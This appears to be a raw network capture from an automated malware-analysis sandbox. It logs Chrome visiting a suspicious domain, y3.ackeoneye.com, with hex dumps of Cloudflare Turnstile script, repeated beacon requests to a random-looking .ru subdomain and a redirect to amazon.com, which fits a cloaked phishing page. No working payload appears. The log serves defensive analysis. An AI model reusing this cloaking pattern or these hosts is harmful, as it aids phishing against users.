                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                                                                                                  Data Ascii: e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 71 74 28 65 29 7c 7c 7a 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 56 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                  Data Ascii: ray$/.test(a))return ot(e,t)}}function Se(e,t){return qt(e)||zt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ve(e,t){var a={label:0,sent:function(){if(l[0
                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var Pe=300030;var We=300031;var j;(fu
                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b
                                                                                                                                  Data Ascii: R="never",e.MANUAL="manual",e.AUTO="auto"})(ee||(ee={}));var ce;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ce||(ce={}));var Q;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(Q||(Q={}));var me;
                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 22 73 74 72 69 6e 67 22 26 26 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 4c 2e 4e 4f 52 4d 41 4c 2c 4c 2e 43 4f 4d 50 41 43 54 2c 4c 2e 49 4e 56 49 53 49 42 4c 45 2c 4c 2e 46 4c 45 58 49 42 4c 45 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 6b 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75
                                                                                                                                  Data Ascii: "string"&&Nr.test(e)}function pt(e){return M([L.NORMAL,L.COMPACT,L.INVISIBLE,L.FLEXIBLE],e)}function vt(e){return M(["auto","manual","never"],e)}function mt(e){return M(["auto","manual","never"],e)}var kr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){retu
                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 49 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44 22 3a 22 66 62 45 22 3b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 73 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 70 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76
                                                                                                                                  Data Ascii: o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,g,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",I=a["feedback-enabled"]===!1?"fbD":"fbE";return"".concat(s,"/cdn-cgi/challenge-platform/").concat(p,"turnstile/if/ov
                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 29 7b 69 66 28 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 3d 3d 22 75 6e 64 65 66 69 6e 65
                                                                                                                                  Data Ascii: if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writable:!0,configurable:!0}}),t&&te(e,t)}function ze(){if(typeof Reflect=="undefine
                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 71 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 7a 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 73 72 28 74 68 69 73 2c 63 29 7d 7d 76 61 72 20 66 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 75 72 28 61 2c 65 29 3b 76 61 72 20 74 3d 64 72 28 61 29 3b
                                                                                                                                  Data Ascii: eof t=="function")?t:qe(e)}function dr(e){var t=ze();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,arguments);return sr(this,c)}}var fr=function(e){"use strict";ur(a,e);var t=dr(a);
                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 6c 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b 74 2e 77 72 61 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 6d 28 22 43 61 6e 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 57 69 64 67 65 74 2c 20 45 6c 65 6d 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 20 28 23 22 2e 63 6f 6e 63 61 74 28
                                                                                                                                  Data Ascii: -cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((l=t.params.theme)!==null&&l!==void 0?l:t.theme,"/").concat(a);t.wrapper.parentNode||m("Cannot initialize Widget, Element not found (#".concat(


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  13192.168.2.54973135.190.80.14433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:58 UTC549OUTOPTIONS /report/v4?s=%2F6ROHfEAEbc7x2dx%2BM4cZ7exDP81u%2Fj9itd0a6%2FlwJi0JyF1ZCOaeigw7ngWXDI4TdWYPFVGNjq1YGj0Wuw%2BlPX7TbIzxXnibU207UDQ7VpFUj2wLIGCNPAqU7%2FluwfYNodH4w%3D%3D HTTP/1.1
                                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Origin: https://y3.ackeoneye.com
                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:44:59 UTC336INHTTP/1.1 200 OK
                                                                                                                                  Content-Length: 0
                                                                                                                                  access-control-max-age: 86400
                                                                                                                                  access-control-allow-methods: OPTIONS, POST
                                                                                                                                  access-control-allow-origin: *
                                                                                                                                  access-control-allow-headers: content-length, content-type
                                                                                                                                  date: Mon, 27 Jan 2025 14:44:58 GMT
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  14192.168.2.54973235.190.80.14433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:59 UTC490OUTPOST /report/v4?s=%2F6ROHfEAEbc7x2dx%2BM4cZ7exDP81u%2Fj9itd0a6%2FlwJi0JyF1ZCOaeigw7ngWXDI4TdWYPFVGNjq1YGj0Wuw%2BlPX7TbIzxXnibU207UDQ7VpFUj2wLIGCNPAqU7%2FluwfYNodH4w%3D%3D HTTP/1.1
                                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 427
                                                                                                                                  Content-Type: application/reports+json
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:44:59 UTC427OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 35 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 79 33 2e 61 63 6b 65 6f 6e 65 79 65 2e 63 6f 6d 2f 6c 6f 39 32 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 33 2e 32 32 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                                                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":158,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://y3.ackeoneye.com/lo92/","sampling_fraction":1.0,"server_ip":"104.21.93.228","status_code":404,"type":"http.error"},"type":"network-error","
                                                                                                                                  2025-01-27 14:44:59 UTC168INHTTP/1.1 200 OK
                                                                                                                                  Content-Length: 0
                                                                                                                                  date: Mon, 27 Jan 2025 14:44:59 GMT
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  15192.168.2.549791188.114.97.34433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:10 UTC682OUTGET /bEmTqrYUaHkPBUqKbdSeNlTEUUwROWNqUMGQBEHFEJZNTPHGLEVGQUDYTUZFTAGOETTRRZRXOXKTBOSDNUUYO HTTP/1.1
                                                                                                                                  Host: v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://y3.ackeoneye.com
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://y3.ackeoneye.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:11 UTC890INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:11 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1O423XUd54kk7kH5%2Fs8g3Mp7AkvE27ujf9koCFlvWI4gygaif9eCUOOmVDydFANo9SlOFQGSyoU5lyUG6elzvF6pUqLdhbT11U3itUlm%2B0uaMmWFhuMdEdG6CSWm4P1ER%2FW2Xnd0pdqk%2F%2BnEXJgF1KarpG9DnrxoZdnjkgVwjW8WQoCTNBbTohiu4Mv5zh9Jr1NdBvya"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 908986674ae50ca0-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1700&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1260&delivery_rate=1717647&cwnd=239&unsent_bytes=0&cid=b96e8196f14e7f06&ts=587&x=0"
                                                                                                                                  2025-01-27 14:45:11 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                  Data Ascii: 11
                                                                                                                                  2025-01-27 14:45:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  16192.168.2.54979899.86.8.424433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:12 UTC699OUTGET / HTTP/1.1
                                                                                                                                  Host: www.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  Referer: https://y3.ackeoneye.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:12 UTC523INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:12 GMT
                                                                                                                                  x-amz-rid: FX8PKVREDAYJTT4H6MBJ
                                                                                                                                  Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                  Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                  Via: 1.1 f038e7175be9761825b2eefc2b0a832e.cloudfront.net (CloudFront)
                                                                                                                                  X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  X-Amz-Cf-Id: rXRovMQct4zjLsSvTb_yXSB3qCVckWVaVwhxYunEEe-wLsnzzNFELQ==
                                                                                                                                  2025-01-27 14:45:12 UTC6599INData Raw: 31 39 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 20 61 2d 6c 74 2d 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d
                                                                                                                                  Data Ascii: 19bf<!DOCTYPE html>...[if lt IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8 a-lt-ie7"> <![endif]-->...[if IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8"> <![endif]-->...[if IE 8]> <html lang="en-us" class="a-no-js a-
                                                                                                                                  2025-01-27 14:45:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  17192.168.2.549805188.114.97.34433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:12 UTC476OUTGET /bEmTqrYUaHkPBUqKbdSeNlTEUUwROWNqUMGQBEHFEJZNTPHGLEVGQUDYTUZFTAGOETTRRZRXOXKTBOSDNUUYO HTTP/1.1
                                                                                                                                  Host: v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:13 UTC888INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:13 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=deWrWrTK6xZdaOM0EjBulJJrixo5jb1xF4khUsHW1FEeYkqhynPjoPo8Tp4lSnWKTtxOtaOrLQBI%2BAMWDgGMnIkq2IlplwqtoUcrULLkqGVh5qK7FrGmmjleC%2FtqiHO90R72kj8kaGRpC8cG54%2BLLI5grkz5tid52XB7gYM5mm2E35Ikl5d3Eg%2FafgTnC46pKwKaTLeM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 908986716b0a42f1-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2191&min_rtt=2135&rtt_var=841&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1054&delivery_rate=1367681&cwnd=214&unsent_bytes=0&cid=d5d30402339e6ca2&ts=633&x=0"
                                                                                                                                  2025-01-27 14:45:13 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                  Data Ascii: 11
                                                                                                                                  2025-01-27 14:45:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  18192.168.2.549810108.138.16.1954433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:13 UTC635OUTGET /images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1cc02ce238101.secure.min._V1_.css HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
